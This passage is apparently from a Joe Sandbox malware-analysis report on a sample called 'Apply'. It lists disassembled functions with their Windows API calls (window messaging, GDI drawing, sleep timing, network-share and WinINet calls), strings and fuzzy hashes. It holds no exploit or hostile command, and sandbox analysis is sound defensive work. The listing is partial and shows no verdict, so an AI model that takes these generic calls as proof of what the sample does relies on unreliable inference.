LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0088336A,00000364,00000000,00000000,00000000,?,008835DB,00000006,FlsSetValue,008F3268,FlsSetValue,00000000), ref: 0088340F

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6f368c933832b4e50a81dbf42bc887d9db2e12bea65528770b0688a5987d228a
Instruction ID: 34b7444906d65853895ed589f79cd50a29e9dbb8d4dfd300b69961276a4cf64f
Opcode Fuzzy Hash: 6f368c933832b4e50a81dbf42bc887d9db2e12bea65528770b0688a5987d228a
Instruction Fuzzy Hash: C001F732611326ABC7325B78AC84E6A7758FF64FA4B210620FD16EB240D720D905C7E4

Function 008BB7A9 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,008BB3D4,?,00008000), ref: 008BB7C5
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,008BB3D4,?,00008000), ref: 008BB7EA
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,008BB3D4,?,00008000), ref: 008BB7F4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,008BB3D4,?,00008000), ref: 008BB827

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 0db6fb3348909c9f320a5c32a50dc891413226f2b2623ae430b5aee6125753de
Instruction ID: 432365bfe3a41e58a901604b598d13f2b451b883a2a0927d6e2aa6620f8ba35a
Opcode Fuzzy Hash: 0db6fb3348909c9f320a5c32a50dc891413226f2b2623ae430b5aee6125753de
Instruction Fuzzy Hash: A0113971D0062DEBCF009FE4E988AEEBB78FF49751F114095D841B6240CB709A548B95

Function 008E8500 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 008E851F
ScreenToClient.USER32(?,?), ref: 008E8537
ScreenToClient.USER32(?,?), ref: 008E855B
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E8576

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 871ba4cb675b2df9919ed2a2f350998a4933da5d8c43e9a95b19ba05e51e9a10
Instruction ID: 58bcf31b5f87ae154fc1fe25bfbecf74c5e54ddd7fcf9f949ae6e94722743186
Opcode Fuzzy Hash: 871ba4cb675b2df9919ed2a2f350998a4933da5d8c43e9a95b19ba05e51e9a10
Instruction Fuzzy Hash: C21142B9D00249EFDB41CFA9D884AEEBBF5FB18310F108166E915E7220D735AA54CF90

Function 008B3489 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 008B34A7
GetWindowThreadProcessId.USER32(?,00000000), ref: 008B34B8
GetCurrentThreadId.KERNEL32 ref: 008B34BF
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 008B34C6

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 2a246780677a55387e3316612a95676e27ee516335e519d19e3071682e164f00
Instruction ID: 70e14e3a50aebb2e83a7fab0007cc73810c9f47f0bc857796906a225e634fbff
Opcode Fuzzy Hash: 2a246780677a55387e3316612a95676e27ee516335e519d19e3071682e164f00
Instruction Fuzzy Hash: 04E0D17150132477D7205B629C4DFE77F5CFF52BA1F400015F505D5191D6A8C948C1F0

Function 008E8F4F Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0086986F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008698C9
Part of subcall function 0086986F: SelectObject.GDI32(?,00000000), ref: 008698D8
Part of subcall function 0086986F: BeginPath.GDI32(?), ref: 008698EF
Part of subcall function 0086986F: SelectObject.GDI32(?,00000000), ref: 00869918

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 008E8F73
LineTo.GDI32(?,?,?), ref: 008E8F80
EndPath.GDI32(?), ref: 008E8F90
StrokePath.GDI32(?), ref: 008E8F9E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 8be454303d6a3d617fee8b2df62220dc37134dd88d421a5002c5e47c5f0b289f
Instruction ID: 2c07cf827d8f92d32ae0ba848d9fb364de773b93d8a5eca1bcef4247640af33b
Opcode Fuzzy Hash: 8be454303d6a3d617fee8b2df62220dc37134dd88d421a5002c5e47c5f0b289f
Instruction Fuzzy Hash: E0F05431005695BADB125F959C0DFCE3F59BF06310F088100FA11660E187759556EBD5

Function 008AEACE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 008AEACE
GetDC.USER32(00000000), ref: 008AEAD8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 008AEAF8
ReleaseDC.USER32(?), ref: 008AEB19

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c8b5717c6ad6f7f2b8c69e1c15ccad88a4b5e87faff3a8a3afa760c58feb3d1d
Instruction ID: 29edda462ff370bf4f60370688c3267228a2d3b9bd1899657f6a9201545da455
Opcode Fuzzy Hash: c8b5717c6ad6f7f2b8c69e1c15ccad88a4b5e87faff3a8a3afa760c58feb3d1d
Instruction Fuzzy Hash: 3AE04F75800314EFCF409FA4D988A5DBBB1FB68315F108445F82AEB360DB785945DF41

Function 008AEAE2 Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 008AEAE2
GetDC.USER32(00000000), ref: 008AEAEC
GetDeviceCaps.GDI32(00000000,0000000C), ref: 008AEAF8
ReleaseDC.USER32(?), ref: 008AEB19

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 89fac920ee4d4f100a01152fc9cb7db9e82bd87cc96645f234807264035f4b77
Instruction ID: f023afe70d3556c6d901ebabb334d6bd9453afd9bbd9ed535d7eaa181e2080b8
Opcode Fuzzy Hash: 89fac920ee4d4f100a01152fc9cb7db9e82bd87cc96645f234807264035f4b77
Instruction Fuzzy Hash: 14E012B5800304EFCF509FA49988A5DBBB1FB68315B108049E92AEB360DB386A09DF40

Function 008C54F6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00853914: _wcslen.LIBCMT ref: 00853919

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 008C5643

Strings

LPT, xrefs: 008C556A
*, xrefs: 008C557F

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 302d16371c6dbc24c15ece8140f5f047599587f23d1f3367f197916cad9c4c01
Instruction ID: dd36d9cff7d3fb53c8eda1cb99208310b14bef59375569149c51f4a706dd4b5c
Opcode Fuzzy Hash: 302d16371c6dbc24c15ece8140f5f047599587f23d1f3367f197916cad9c4c01
Instruction Fuzzy Hash: 1C912775A00604DFCB15DF58C484EAABBB5FF48304F59809DE80A9B362D771EE86CB91

Function 0087E5CD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0087E65D

Strings

pow, xrefs: 0087E635, 0087E652

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: e7f21494844811ac22354a2837891069da2cab997e35b9f73bcba8ad791cc6c3
Instruction ID: 65e6e3307a6cbb01208cc9b25855c97ada5db6e3ab091ed37b85cd62b1f6ea7b
Opcode Fuzzy Hash: e7f21494844811ac22354a2837891069da2cab997e35b9f73bcba8ad791cc6c3
Instruction Fuzzy Hash: C451BB65A08105C6C715BB28CD4577A3BA4FB24750FB4CD98F089C62ADEF34CC96DB46

Function 0086A7AA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

#, xrefs: 0086A7D4

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 22e43e1ffbb46d12958084aa626186794b73b8930743a90e7f2afe551ade793b
Instruction ID: 48cfe66884b22e269004246c07a57c8bfbec972ef44fc40495412a5e84caddf8
Opcode Fuzzy Hash: 22e43e1ffbb46d12958084aa626186794b73b8930743a90e7f2afe551ade793b
Instruction Fuzzy Hash: BF51EF7550424ADFEF19DF28C0846BA7BA0FF16714F244065EC91EB790DA349D47CBA2

Function 008CD863 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008CD89F
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008CD8A9

Strings

|, xrefs: 008CD87A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: eca92ff2c50a5bd0bb2437b806ec17ed1ddfa1df890e9ccc3f04b17f3bf7a93c
Instruction ID: 7215d00763a9fe1bd1b08132f548bf72289cbe1354a8f2b96b467f7663c6ef06
Opcode Fuzzy Hash: eca92ff2c50a5bd0bb2437b806ec17ed1ddfa1df890e9ccc3f04b17f3bf7a93c
Instruction Fuzzy Hash: 1831F971801219ABDF15AFA4DC85EEEBFB9FF08304F104029F815B6265EB319A1ADB51

Function 008E4CF7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 008E4DDF
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008E4DF4

Strings

', xrefs: 008E4D4E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 113d72c03404b8a524b2ec2a05739f1ca230ed5b2d4b76b0dbef052d86d9cd9a
Instruction ID: 9d79e6d3eab33ac3f39737d99640d0c2d14a7de5c32de2982a6e704d9968ba94
Opcode Fuzzy Hash: 113d72c03404b8a524b2ec2a05739f1ca230ed5b2d4b76b0dbef052d86d9cd9a
Instruction Fuzzy Hash: 11310A74A0134AAFDB14CFA6C980BDA7BB5FB4A300F105169E918EB391D770A945CF90

Function 008E39AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008E3A3A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008E3A45

Strings

Combobox, xrefs: 008E3A07

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: a2cc2eb733cb7b0b0c7f57c16f25bb37cc2119d57f343a6b3be1489f6e788550
Instruction ID: 58640c8a25352d19e1b36b4f2a89d137f170f8d551afd753d2113ce7107e3a75
Opcode Fuzzy Hash: a2cc2eb733cb7b0b0c7f57c16f25bb37cc2119d57f343a6b3be1489f6e788550
Instruction Fuzzy Hash: C211EF71300648BFEF219F15CC85EBB3BAAFB8A3A4F104124F968DB291D7719D918760

Function 008CD48D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008CD4EC
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008CD515

Strings

<local>, xrefs: 008CD4D5

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 88808b813f3307766139ede8ec9f844d0407cfe0f586c73e2a8dba0a6865c558
Instruction ID: fbdad112e608fe3351a3f2c51f9bd1d9453e4d45c17dfcfc20270c33a7e8fadd
Opcode Fuzzy Hash: 88808b813f3307766139ede8ec9f844d0407cfe0f586c73e2a8dba0a6865c558
Instruction Fuzzy Hash: 0C1191612153257AD7385B668C89FF7BEACFB127A8F00422AB609C3180D270E884C6B4

Function 008B737F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

CharUpperBuffW.USER32(?,?,?), ref: 008B73AF
_wcslen.LIBCMT ref: 008B73BB

Strings

STOP, xrefs: 008B73B5, 008B73BA

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: a3f0ce5eac2b7506b48fb233104f6ce005c4b38cd0938250aadc8a61c2395e31
Instruction ID: b1072900ca78692e8a34ae44403b7542aecdc1f8987d7214ef661a56a6762417
Opcode Fuzzy Hash: a3f0ce5eac2b7506b48fb233104f6ce005c4b38cd0938250aadc8a61c2395e31
Instruction Fuzzy Hash: 0901AD32A5462A8BCB219EBDDC809EF77E4FBA4714B500924E821D63A1EB30D908D651

Function 008B23C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

Part of subcall function 008B4392: GetClassNameW.USER32(?,?,000000FF), ref: 008B43B5

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008B242E

Strings

ComboBox, xrefs: 008B23CD
ListBox, xrefs: 008B23F8

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 945ec84f08a8c1640b7ac0aa616a383b6bd564765acdf8ae8030403ceee2c299
Instruction ID: bd64adf285a8d32816f0ea089c9f7fe3be3b5f743e68a2b0aaa73f9ad6f69221
Opcode Fuzzy Hash: 945ec84f08a8c1640b7ac0aa616a383b6bd564765acdf8ae8030403ceee2c299
Instruction Fuzzy Hash: F101F5716452196BCB08EBA8CC91CFE37A4FF46314B000A19B873DB3D2DA30580D8712

Function 008B22BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

Part of subcall function 008B4392: GetClassNameW.USER32(?,?,000000FF), ref: 008B43B5

SendMessageW.USER32(?,00000180,00000000,?), ref: 008B2328

Strings

ComboBox, xrefs: 008B22C7
ListBox, xrefs: 008B22F2

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 3ec7a3aecb293fe2410fadb8fe65fb1659eaf0fe4498e8c0f4c39f6a4ee5853e
Instruction ID: fd6cb06a244f6bf3ae8c83b6072984602bfa1ca51eda88352fd85a05f8f1235b
Opcode Fuzzy Hash: 3ec7a3aecb293fe2410fadb8fe65fb1659eaf0fe4498e8c0f4c39f6a4ee5853e
Instruction Fuzzy Hash: B701F771A811086BCB08E794C992EEF77E8FF09300F1404197903E7392DA149E0D9773

Function 008B233E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

Part of subcall function 008B4392: GetClassNameW.USER32(?,?,000000FF), ref: 008B43B5

SendMessageW.USER32(?,00000182,?,00000000), ref: 008B23AA

Strings

ComboBox, xrefs: 008B234B
ListBox, xrefs: 008B2376

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 819d565e1d6a2988ab72074698964dce92703fdb8e907fe1d8015a33a578c077
Instruction ID: c1559d770dd96ccb697c40dcc2f478438d94612a41981f669eb00c19e05f2de9
Opcode Fuzzy Hash: 819d565e1d6a2988ab72074698964dce92703fdb8e907fe1d8015a33a578c077
Instruction Fuzzy Hash: 2E01D471A4010867CB04EB94C982EEE37E8EB09344F5404157802E7392DA248E0D9773

Function 008B244A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

Part of subcall function 008B4392: GetClassNameW.USER32(?,?,000000FF), ref: 008B43B5

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 008B24B5

Strings

ComboBox, xrefs: 008B2457
ListBox, xrefs: 008B2482

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

